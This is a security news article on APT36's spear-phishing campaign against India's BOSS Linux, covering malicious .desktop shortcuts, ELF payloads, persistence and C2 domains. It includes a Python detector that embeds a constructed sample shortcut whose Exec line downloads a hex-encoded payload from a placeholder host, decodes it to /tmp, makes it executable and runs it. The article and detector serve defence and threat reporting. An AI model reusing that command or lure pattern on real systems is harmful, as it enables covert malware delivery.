Indian BOSS Linux Under Siege – APT36 Exploits Malicious .desktop Shortcuts

The Pakistan-linked threat group APT36, also known as Transparent Tribe, has intensified its espionage efforts against India by deploying customized malware aimed directly at the BOSS Linux operating system.

According to researchers at CYFIRMA, this campaign, first observed in early August 2025, demonstrates a significant escalation in the group’s sophistication.

Traditionally reliant on Windows-based payloads and phishing documents, APT36 is now actively weaponizing BOSS-specific attack chains, a worrying development given the system’s widespread use across Indian government entities.

The attack commences through spear-phishing emails that deliver a compressed archive, concealing a malicious .desktop file disguised as an official government notice.

When opened, the file executes stealthy command sequences that initiate the download and execution of a hidden binary, while simultaneously presenting the victim with a harmless PDF decoy to maintain the illusion of legitimacy.

Malicious Shortcuts Deliver Stealthy ELF Payloads

The centerpiece of the campaign is the .desktop file, crafted to resemble a legitimate PDF shortcut but laced with commands in its Exec field.

Once launched, it leverages utilities such as curl and xxd to fetch a hex-encoded payload from the attacker infrastructure, decode it into binary form, store it under /tmp, and activate it in the background, with execution rights silently granted via chmod.

This mechanism ensures the malware runs covertly, without presenting any visible terminal window. To secure persistence, the attackers exploit autostart entries that re-trigger the payload each time the user logs in.
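A defender-side check for the shortcut pattern described above, added here as an example and not code from CYFIRMA or the article: it parses a .desktop file, flags Exec fields that download, hex-decode, drop to /tmp, chmod and background a binary, and sweeps the autostart directories used for persistence. The two sample shortcuts, the placeholder.invalid URL and the file paths are constructed for the example.

```python
import glob
import os
import re
from configparser import ConfigParser
# Constructed sample shaped like the lure the article describes: a "PDF" whose Exec
# downloads, hex-decodes, drops to /tmp and runs a binary. URL and paths are placeholders.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Name=Government_Notice.pdf
Terminal=false
Exec=bash -c "curl -s http://placeholder.invalid/p.txt | xxd -r -p > /tmp/.cache_x; chmod +x /tmp/.cache_x; /tmp/.cache_x &"
"""
# Constructed benign shortcut: a PDF opened through the desktop's default handler.
BENIGN_DESKTOP = """[Desktop Entry]
Name=Annual Report.pdf
Exec=xdg-open /home/user/Documents/annual_report.pdf
"""
# Indicator rules applied to the Exec value; each mirrors one step of the described chain.
INDICATORS = [
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("hex-decode", re.compile(r"\bxxd\s+-r\b|\bbase64\s+(-d|--decode)\b")),
    ("writes-to-tmp", re.compile(r"/tmp/|/dev/shm/")),
    ("grants-exec", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("shell-wrapper", re.compile(r"\b(ba|z|da)?sh\s+-c\b")),
    ("background-run", re.compile(r'&\s*"?\s*$|\bnohup\b')),
]
PDF_OPENERS = re.compile(r"^\s*(xdg-open|evince|okular|gio\s+open)\b")
def parse_entry(text):
    """Return (Name, Exec) from .desktop text; missing keys become ''."""
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str  # .desktop keys are case-sensitive
    cp.read_string(text)
    sec = "Desktop Entry"
    return cp.get(sec, "Name", fallback=""), cp.get(sec, "Exec", fallback="")

def analyze(text):
    """Return the indicator labels matched by one .desktop file (empty list = clean)."""
    name, exec_line = parse_entry(text)
    hits = [label for label, rx in INDICATORS if rx.search(exec_line)]
    # A shortcut posing as a PDF but not launched through a viewer is the lure pattern.
    if name.lower().endswith(".pdf") and not PDF_OPENERS.match(exec_line):
        hits.append("pdf-lure-mismatch")
    return hits

def scan_autostart(dirs=("/etc/xdg/autostart", os.path.expanduser("~/.config/autostart"))):
    # Map each autostart shortcut to its hits: the persistence location the article names.
    findings = {}
    for d in dirs:
        for path in glob.glob(os.path.join(d, "*.desktop")):
            with open(path, errors="replace") as fh:
                findings[path] = analyze(fh.read())
    return findings
```

Run `scan_autostart()` on a BOSS Linux host to list every autostart shortcut with its matched indicators; any entry with several hits, or the PDF-lure mismatch, warrants manual review.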

Static analysis of the retrieved ELF executable reveals a Go-based binary with obfuscated headers and missing section names, traits commonly associated with packed or tampered malware.

More alarmingly, dynamic examination uncovered its reliance on systemd services and cron jobs for long-term persistence, in parallel with communication to a command-and-control node hosted at “modgovindia[.]space” on port 4000.

Additional infrastructure, including the newly registered domain “securestore[.]cv”, has been identified as part of the delivery chain, reinforcing the assessment of a coordinated state-backed operation.

Strategic Implications and Defensive Priorities

This latest campaign underscores a deliberate and evolving strategy by APT36 to infiltrate India’s technological backbone.

By expanding its toolkit to compromise BOSS Linux specifically, the group is aiming to undermine trust in homegrown operating systems deployed across defense, diplomatic, and critical administrative structures.

Researchers warn that the ability to run cross-platform espionage operations magnifies the potential for sustained access and data theft.

For Indian institutions, the implications are severe, as reliance on spear-phishing combined with Linux-specific persistence allows attackers to bypass traditional security controls that remain heavily tuned toward Windows environments.

CYFIRMA’s findings highlight the pressing need to revise defense-in-depth models, incorporating Linux-capable endpoint detection, stricter execution controls over untrusted shortcut files, and proactive blocking of known malicious domains.

APT36’s consistent focus on India reflects broader geopolitical motives, with each new iteration of its tactics reinforcing the necessity of a vigilant and adaptive security posture.


Priya
Priya is a Security Reporter who tracks malware campaigns, exploit kits, and ransomware operations. Her reporting highlights technical indicators and attack patterns that matter to defenders.
